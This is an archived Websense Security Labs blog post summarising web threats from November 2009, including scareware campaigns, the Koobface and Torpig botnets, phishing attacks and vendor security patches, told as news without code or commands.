Websense.com / Security Labs / Blogs / This Month in the Threat Webscape

Archived Blog

This Month in the Threat Webscape

12.07.2009 - 5:27 PM

Update 12/14/2009: Added email stats/charts (sorry, a little late this month!)

Month of November 2009

Major hits

A fake blog campaign prompts users to install scareware and compromises over a million sites. The compromised sites use automatically generated content in hopes of appearing in search engine queries. When a user clicks on one of these links, he or she is redirected to a fake anti-virus site that displays fake results from a purported virus scan of the user's computer, prompting the user to run an executable. The scareware campaign is triggered only if the visitor is referred to by Google, Yahoo, Live, Altavista or Baidu.

Some pages on michaeljackson.com were compromised via javascript injection, although users were not redirected to malware.

The official Web site of the Singapore Foreign Exchange Market was compromised and injected with malicious code via an iframe redirector that drops a malicious file onto the victim's computer.

A major online ad site, media-servers.net, was compromised. Injected code served up an exploit cocktail that attempted to exploit vulnerabilities in Microsoft DirectShow, Microsoft Snapshot Viewer, MDAC, AOL ConvertFile(), Adobe Reader and Adobe Acrobat. However, the actual ads served from ad.media-servers.net were not affected.
A scareware campaign was launched by miscreants using Google sponsored ads in an attempt to hijack popular searches.

Web 2 dot uh-oh

The Torpig botnet is employing what appears to be a novel technique for escaping detection. It computes a drive-by-download domain by combining the current date with search trend data from Twitter. A more in-depth analysis of the botnet can be found here.

The Koobface worm writers were busy this month. Among their exploits:
  • Getting into the holiday spirit by switching to a Christmas themeThe botnet also experimented with serving client-side exploits, though this approach appears to have been abandoned for now.
  • Using Google Reader to host pages that themselves host fake videos that prompt the user to install malware.
  • Attempting to force users of infected computers to break Facebook CAPTCHAs. Users are presented with a dialog that threatens to shut down their computer if they do not complete a CAPTCHA.
  • Their most recent update is a "visual social engineering element" strategy that adds descriptive domains after the original link, e.g. bit.ly/588dmE?YOUTUBE.COM/ea05981d43. To help protect against these types of attacks, bit.ly has recently partnered with Websense.
A PHP script that brute force cracks the passwords of Wordpress accounts has been found in the wild. It is able to do this in a distributed manner by connecting to a central MySQL database to maintain state.

Facebook fell victim to a worm that spreads via Cross-site Request Forgery (CSRF). All a user has to do to fall prey is click a link (next to a titillating photo of a young lady) on a friend's wall, titled "click da' button, baby!"

Browsing for dirt

Another “silent patch” has been distributed by Google for its Chrome browser after the discovery of a pair of vulnerabilities. Details of both have been kept undisclosed until a majority of users are up to date with the fix. One of the vulnerabilities was ranked “high-risk” due to its threat of arbitrary code execution.

Two security holes is bad, but three is surely worse. Opera released the newest version of its browser, 10.10, patching three “extremely severe” vulnerabilities. They include the possibility of heap buffer overflows, the leaking of error messages onto unrelated sites, and an undisclosed third one. We're wondering what that one was about.

If two is bad and three worse, what can we say about seven? Exactly such a number of security flaws have been patched in the newest Apple Safari 4.0.4. Users of both Windows and Mac operating systems have been exposed to a wide range of malicious hacker attacks.

Several security flaws have been patched in the newest version of Adobe Shockwave Player, including a “run malicious code” bug and other similarly juicy ones.

We have already had two, three, seven and several holes, but how about 50? To be more precise, 50 million files have been exposed to potential leakage of sensitive information due to Microsoft's bug in the Internet Explorer PDF exporting function. All such generated documents reveal the file's full storage path. What else have we to ask for?

Microsoft

Microsoft issued six security bulletins with fixes for a total of 15 vulnerabilities on Patch Tuesday, November 10th. Three of them were tagged as "Critical". MS09-065 deserves special attention. A specially crafted Embedded OpenType (EOT) font can be used to allow remote code execution if a user viewed content rendered. A proof-of-concept exploit has already been fit into the Metasploit point-and-click tool. Although the code only triggers a BOSD now, the experts expect that it will get reliable code execution very soon.

And the new Windows 7 seems not to be very safe. A recent test reveals that 8 of 10 malwares bypassed the default UAC(user access control). Also an SMB exploit that can cause denial of service in Windows 7 and Windows Server 2008 R2 has been confirmed by Microsoft.

There is also a zero day exploit that can affect IE 6 and 7 on fully patched Windows XP SP3 systems. This exploit will be triggered when retrieving certain CSS/STYLE objects via the "getElementsByTagName()" method. The attacker could execute arbitrary code by tricking a user into visiting a mal crafted web page.

Hello ThreatSeeker. You've got mail!





 

 

 

So long, and thanks for all the phish

Visa phishing campaign targets holiday shoppers who buy gifts online. The attack attempts to exploit the “Verified By Visa” program that provides shoppers with an additional layer of safety, and assures merchants that large transactions that are likely to happen during the holidays, are legitimate. Therefore, purchases are approved quickly, without triggering fraud alerts. 

The phishing email redirects the victim to a spoofed page that harvests all the information the victim provided the card-issuing bank at the time of sign up for the credit card. 

PandaLab has warned against a facebook phishing attempt that aims to harvest facebook credentials. Once the victim enters a username and the password, he or she is redirected to an error message claiming an "incorrect email/password combination".

Security Trends

The first iPhone worm was launched in the beginning of November in Australia. The worm, written by a hacker calling himself "ikee", changes the lock background wallpaper to an image of Rick Astley if the iPhone installed SSH with the default password. Furthermore, a more malicious hacker could take the code written by ikee and adapt it to have a more sinister payload.

Man-in-the-middle attacks against several smartphones over insecure Wi-Fi networks is taking place everywhere. Hackers can sniff on several mobile devices using the publicly available SSLstrip tool if the smartphone owner accesses a Web site over a public Wi-Fi network.

To wrap it up, "ransomware" typically encrypts some of the user's personal files, or locks the display at system startup. Now, users may stumbled upon a new piece of ransomware that blocks Internet access until a fee is paid via SMS.


Thanks to the following contributors for this month's roundup:

- Sebastian Becerra (Security & Technology Research)
- Lei Li (Security & Technology Research)
- Ulysses Wang (Security & Technology Research)
- Ivan Sabo (Security & Technology Research)
- Saeed Abu-Nimeh (Security & Technology Research)
- Jay Liew (Security & Technology Research)

Bookmark This Post: